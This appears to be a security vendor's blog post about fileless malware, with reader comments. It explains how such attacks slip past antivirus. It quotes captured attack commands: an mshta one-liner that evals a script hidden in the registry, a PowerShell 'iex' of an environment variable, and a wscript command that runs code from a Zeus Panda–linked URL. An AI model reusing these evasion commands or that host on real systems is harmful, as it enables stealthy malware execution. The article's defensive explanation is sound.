Fileless infections – Ransomware’s latest trick

If one thought May 2017’s WannaCry ransomware scare was bad, it’s just the beginning. Each year, as more ransoms are paid, the cybercriminals have more capital to invest in new technologies and techniques. One of their most promising techniques is fileless infections or scripting attacks.

Historically, malware and now ransomware sneaked a program onto a computer, and then either overtly or covertly attempted the execution of said file. The common thread in these attacks is that a file is downloaded and then attempts to execute. The architecture of antivirus software employs a file system driver. This driver traps the file and then determines whether it can execute.

A fileless malware does not drop a file and bypasses the file system driver of mainstream AV. Instead, scripts are written and executed through known good script engines such as Powershell, MSHTA, Cscript and Wscript. Show and tell time.

C:\WINDOWS\system32\mshta.exe “javascript:QNm90c=”8YNUG”;
S07R=new ActiveXObject(“WScript.Shell”); e91eHqEE=”l”; l21MJb=S07R.RegRead (“HKCU\\software\\lfxqiypm\\qkkqsiqrqk”); g0dn1w=”jSJKZ”; eval(l21MJb); GQEXz2t=”apyD”;”

The above command invokes MSHTA which is a known good commonly used Microsoft application. The command calls Javascipt which in turn calls Wscript to execute a script from a registry key named with random characters. Since the script resides in a registry key, there is no file for the file system driver to analyze.

“C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe” iex $env:kuihcdc

The above command instructs Powershell, another valid Microsoft scripting engine, to execute a script from an environment variable named with random characters. Since the script resides in a environment variable rather than a file, the file system driver has zero visibility on this type of activity.

wscript //B //E:JScript OTTYUADAF “gexywoaxor” “http://hit.thincoachmd.com/?oq=hpKckf7tVaATgjxCHeAFpyI4PUA8X_qyqiEnVmhDPg5_U_kDbMAl19pucJOw6mF4&es_sm=140&

The command above runs Wscript, another valid Microsoft scripting engine, and then switches to Javascript and runs the script directly from a web site with a gnarly query string. Let’s think about this. The above command is instructing wscript to execute code straight from a foreign web site without a file hitting the file system driver.
If one does a search on the strange string “gexywoaxor”, one learns that this malware is a banking trojan called Zeus Panda discovered by Forcepoint.
The article is dated July 2016, and PC Matic blocked the sample in November 2016, 4 months later.

Forcepoint Sample PC Matic Sample
Date Jul 2016 Nov 2016
Scripting Engine Wscript Wscript
Script File Name r3ak.tmp OTTYUADAF
Encryption Key gexywoaxor gexywoaxor
URL ytbuybytvtrcevrtbyybyttvrcrvbyynubyvrvgh hit.thincoachmd.com

In those four months, there were noticeable changes in the attack method, yet the critical encryption key “gexywoaxor” remained unchanged. The fact that a new encryption key was not required, is a sign that this virus was successful in delivering its payload.

Scripting attacks or fileless infections are here today. 25% of all the malware PC Matic blocks is at the script level. In fairness, in today’s environment, frequently, a scripting attack involves dropping a file later to be executed. In that instance, there is a second point at which a file system driver / black list approach can catch and block the intrusion. The problem is that not all scripting attacks drop a file, and that represents a security hole in your company’s antivirus.

(Visited 16,347 times, 1 visits today)

7 thoughts on “Fileless infections – Ransomware’s latest trick

    • Not always. Ransomware can be delivered in various different ways. For instance, at times it can be sent as a malicious file attachment in an email, or it can worm its way in through a software vulnerability. Staying away from unrated websites is a great best practice to avoid malware — but you’ll also need a rock solid security solution. Unfortunately, many of today’s security programs use blacklisting as their primary method for malware detection. This doesn’t work because it treats unknown files as safe until proven harmful — and all new malware threats are unknown files. You’re best bet is to get a security program that uses application whitelisting, because a whitelist treats unknown files as bad until proven safe. Meaning they cannot execute. I hope this helps!

  1. Our analysis shows that wscript runs on 5% of the computers over a three week period. The chances that a Wscript is bad is 12%. So if you turn off all Wscript, you will stop a substantial amount of legitimate activity.

    Powershell on the other hand runs on 1.47% of the computers, and the chances it is bad is 42%.

    Hope this helps.

  2. If a Wscript is disabled this will solve the problem. The bad thing is I do not see how Powershell can be disabled.

Leave a Reply

Your email address will not be published. Required fields are marked *